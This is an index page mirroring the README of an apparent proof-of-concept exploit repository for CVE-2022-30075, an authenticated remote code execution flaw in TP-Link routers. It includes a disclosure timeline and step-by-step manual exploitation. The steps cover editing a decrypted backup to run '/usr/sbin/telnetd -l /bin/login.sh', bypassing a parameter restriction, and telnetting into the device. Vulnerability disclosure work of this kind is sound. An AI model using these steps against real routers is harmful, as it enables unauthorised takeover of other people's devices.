Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/aaronsvk/CVE-2022-30075

Tp-Link Archer AX50 Authenticated RCE (CVE-2022-30075)
https://github.com/aaronsvk/CVE-2022-30075

Last synced: 6 days ago
JSON representation

Tp-Link Archer AX50 Authenticated RCE (CVE-2022-30075)

Host: GitHub
URL: https://github.com/aaronsvk/CVE-2022-30075
Owner: aaronsvk
Created: 2022-06-07T23:26:47.000Z (over 2 years ago)
Default Branch: main
Last Pushed: 2022-11-20T03:03:53.000Z (almost 2 years ago)
Last Synced: 2024-08-01T19:57:47.038Z (3 months ago)
Language: Python
Homepage:
Size: 9.77 KB
Stars: 209
Watchers: 3
Forks: 45
Open Issues: 4
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

# CVE-2022-30075
Authenticated Remote Code Execution in Tp-Link Routers

### Affected Devices
If your Tp-Link router has backup and restore functionality and firmware is older than june 2022, it is probably vulnerable

### Tested With
Tp-Link Archer AX50, other tplink routers may use different format of backups and exploit needs to be modified

### PoC
Using exploit for starting telnet daemon on the router
![tplink](https://user-images.githubusercontent.com/28111712/172499966-8a5d486f-c79d-4fe2-95ff-de77d211ab54.png)

### Manual Exploitation
1. login to router web interface
2. go to advanced -> system -> backup settings
3. decrypt and decompress backup file
- if your router uses different format of backup files you can modify exploit code (class BackupParser) or simply use some tool from github:
https://github.com/stdnoerr/tp_link_credentials_harvester/blob/master/decrypt.py
https://github.com/ret5et/tplink_backup_decrypt_2022.bin
...
4. in decrypted xml file you can find something like this:
```xml

pressed
ledswitch
/lib/led_switch

```
- replace it with these lines
```xml

pressed
ledswitch
/usr/sbin/telnetd -l /bin/login.sh

```
- there is a restriction that blocks modification of parameter `system.button.handler`, but it can be easily bypassed by changing name of parent xml node (e.g. `name="exploit"`)
- code execution can be achieved not only by changing parameter `system.button.handler`, but also using `ddns.service.ip_script`, `firewall.include.path`, `uhttpd.main`, and others...
5. compress and encrypt modified backup file
6. go to advanced -> system -> restore settings -> upload modified backup file
7. after reboot, push the led button that triggers execution of injected command `/usr/sbin/telnetd -l /bin/login.sh`
8. remotelly login to router: `telnet 192.168.1.1`

### Timeline
15.03.2022 - Identified vulnerability
15.03.2022 - Contacted Tp-Link support
16.03.2022 - Recieved response from Tp-Link
02.05.2022 - Assigned CVE
27.05.2022 - Tp-Link released firmware with fixed vulnerability
07.06.2022 - Published technical details